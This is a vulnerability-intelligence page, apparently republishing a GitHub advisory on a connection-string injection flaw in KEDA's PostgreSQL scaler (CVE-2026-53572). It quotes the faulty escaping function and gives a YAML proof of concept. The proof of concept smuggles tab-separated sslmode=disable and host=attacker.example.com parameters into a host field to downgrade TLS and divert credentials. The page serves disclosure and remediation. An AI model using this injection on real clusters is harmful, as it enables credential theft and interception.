KEDA CVE-2026-53572
MEDIUMSeverity by source
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N
Lowered AC to L because tab injection into a hostname field is trivially simple for any tenant once the technique is known; PR:L retained as ScaledObject creation rights are required.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N
Lifecycle Timeline
1DescriptionGitHub Advisory
Summary
pkg/scalers/postgresql_scaler.go builds libpq-style connection strings by concatenating key=value pairs separated by spaces. Each tenant-controllable field (host, port, userName, dbName, sslmode) is passed through escapePostgreConnectionParameter:
func escapePostgreConnectionParameter(str string) string {
if !strings.Contains(str, " ") {
return str // returned as-is for any non-space whitespace
}
str = strings.ReplaceAll(str, "'", "\\'")
return fmt.Sprintf("'%s'", str)
}The function only escapes when a literal space is present. Per libpq/pgx documentation, parameters are also separated by tabs, newlines, carriage returns, and form feeds, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like mydb\tsslmode=disable\thost=attacker.example.com splits into additional key=value tokens when parsed by pgx, injecting attacker-controlled connection parameters.
Vulnerable code
pkg/scalers/postgresql_scaler.go, lines 155-164 and 250-257.
Impact
Tenants with the ability to create a TriggerAuthentication or ScaledObject that populates any of host, port, userName, dbName, sslmode can:
- Force
sslmode=disableon a connection that the cluster owner intended to be TLS-only - silently downgrading to plaintext and enabling on-path MitM. - Redirect the connection to an attacker-controlled host (
host=...) to steal the credentials the operator supplies via thepassword=keyword. - Append arbitrary libpq runtime parameters (
options=,application_name=,target_session_attrs=) to pivot behavior.
Note: the password parameter is appended last in buildConnArray, which limits but does not eliminate credential exfiltration - injected host= still redirects the subsequent password= keyword's target.
Proof of concept
triggers:
- type: postgresql
metadata:
host: "legit.db.svc\tsslmode=disable\thost=attacker.example.com"
port: "5432"
userName: "keda"
dbName: "metrics"
sslmode: "require"
query: "SELECT 1"After escapePostgreConnectionParameter (no space → returned unchanged), the resulting connection string is parsed by pgx into parameters that include host=attacker.example.com and sslmode=disable.
Suggested fix
- Escape / reject any ASCII whitespace (
\t,\n,\r,\f,\v, space) and backslash. - Prefer the URI form (
postgres://user:pass@host:port/db?sslmode=require) with proper URL-encoding. - Validate each field against an allow-list pattern before use.
Resources
pkg/scalers/postgresql_scaler.go- libpq connection string parsing: https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING
AnalysisAI
Connection string injection in KEDA's PostgreSQL scaler allows low-privileged tenants to inject arbitrary libpq connection parameters by embedding tab, newline, or other non-space whitespace characters into ScaledObject or TriggerAuthentication configuration fields. The escapePostgreConnectionParameter function in pkg/scalers/postgresql_scaler.go only detects literal spaces before quoting values, leaving all other libpq token delimiters unescaped; successful exploitation forces TLS downgrade (sslmode=disable) or redirects database connections to attacker-controlled hosts to steal operator-supplied credentials. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires Kubernetes RBAC permission to create or modify ScaledObject or TriggerAuthentication resources referencing the postgresql trigger type within a KEDA-managed namespace - this is the low-privilege (PR:L) requirement in the CVSS vector. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 5.9 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N) assigns High attack complexity, likely reflecting the non-obvious whitespace technique; however, the injection method is mechanically trivial for any informed tenant - simply embedding a tab character in a hostname string - which suggests real-world AC is closer to Low once the technique is known. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A tenant with Kubernetes RBAC permission to create ScaledObjects submits a postgresql trigger whose host field contains an embedded tab character: `legit.db.svc\tsslmode=disable\thost=attacker.example.com`. KEDA's escaping function returns the value unchanged because no literal space is detected, and pgx subsequently parses the resulting connection string as three separate tokens, overriding the cluster operator's intended TLS configuration and legitimate target host. … |
| Remediation | No vendor-released patch version was identified in the available advisory data at time of analysis; the KEDA releases page and GitHub advisory at https://github.com/kedacore/keda/security/advisories/GHSA-6w3m-4hhp-775q should be monitored for a confirmed fix version. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in PostgreSQL
View allPostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() improperl
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, and 9.0.x before 9.0.13 allows re
Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.
PostgreSQL versions before 9.2.22, 9.3.18, 9.4.13, 9.5.8 and 9.6.4 are vulnerable to incorrect authentication flaw allow
The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate t
A vulnerability in the h2oai/h2o-3 REST API versions 3.46.0.4 allows unauthenticated remote attackers to execute arbitra
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_serve
## Summary An unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query strin
Parse Server is an open source http web server backend. Rated critical severity (CVSS 10.0), this vulnerability is remot
Hard-coded default PostgreSQL credentials shipped in the docker-compose.yaml of langgenius Dify through version 1.5.1 al
A vulnerability in the FinanceChatLlamaPack of the run-llama/llama_index repository, versions up to v0.12.3, allows for
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-6w3m-4hhp-775q